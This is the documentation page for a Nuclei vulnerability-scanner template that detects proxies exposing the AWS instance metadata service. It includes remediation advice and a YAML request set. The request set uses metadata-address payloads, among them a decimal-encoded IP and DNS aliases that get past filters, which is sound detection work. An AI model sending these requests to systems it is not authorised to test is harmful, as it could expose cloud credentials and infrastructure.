Skip to content
Nuclei Templates

Amazon AWS Metadata Service Check

ID: metadata-service-aws

Severity: critical

Author: sullo,DhiyaneshDk

Tags: exposure,proxy,aws,amazon,misconfig,metadata

Description

Section titled “Description”

The host is configured as a proxy which allows access to the metadata provided by a cloud provider such as AWS or OVH. This could allow significant access to the host/infrastructure.

YAML Source

Section titled “YAML Source”
id: metadata-service-aws


# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
  name: Amazon AWS Metadata Service Check
  author: sullo,DhiyaneshDk
  severity: critical
  description: The host is configured as a proxy which allows access to the metadata provided by a cloud provider such as AWS or OVH. This could allow significant access to the host/infrastructure.
  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
    - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
    - https://twitter.com/Random_Robbie/status/1268186743657947137
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
  metadata:
    max-request: 4
  tags: exposure,proxy,aws,amazon,misconfig,metadata


http:
  - raw:
      - |+
        GET http://{{hostval}}/latest/meta-data/ HTTP/1.1
        Host: {{hostval}}


    payloads:
      hostval:
        - aws.oast.online
        - 169.254.169.254
        - 2852039166 # decimal encoding
        - 169.254.169.254.nip.io
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "public-ipv4"
          - "privateIp"
        condition: or
# digest: 4b0a004830460221009cd725105c1cbd831d9ee3e532781f2a2d215e96fdae196a278ddf6155f86134022100ab272914b39f3f42004f94a91aea5c466649e1a0471df9f4ab2496c8c8b9d519:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/misconfiguration/proxy/metadata-aws.yaml"

View on Github